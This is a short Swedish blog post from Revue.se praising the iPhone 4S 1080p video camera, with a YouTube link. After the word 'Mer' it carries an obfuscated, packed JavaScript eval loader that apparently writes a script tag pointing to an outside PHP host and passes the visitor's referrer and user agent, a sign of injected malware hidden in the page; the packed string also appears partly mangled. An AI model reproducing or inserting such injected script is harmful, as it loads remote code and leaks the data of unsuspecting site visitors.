Image Image Image Image Image Image Image Image Image Image

| 23 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Så bra är iPhone 4S videokamera med 1080p

Så bra är iPhone 4S videokamera med 1080p
Sebastian Plengier Ehrnfelt

Detta klipp nedan är filmat med nya iPhone 4S 8 megapixel-kamera som finns placerad på baksidan av iPhone 4s.
Jag tycker faktiskt det ser riktigt bra ut och bildstabiliseringen gör verkligen sitt jobb.

httpv://www.youtube.com/watch?v=8NgfM06H90g

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|keakh|var|u0026u|referrer|rztnn||js|php’.split(‘|’),0,{}))
info:
www.apple.com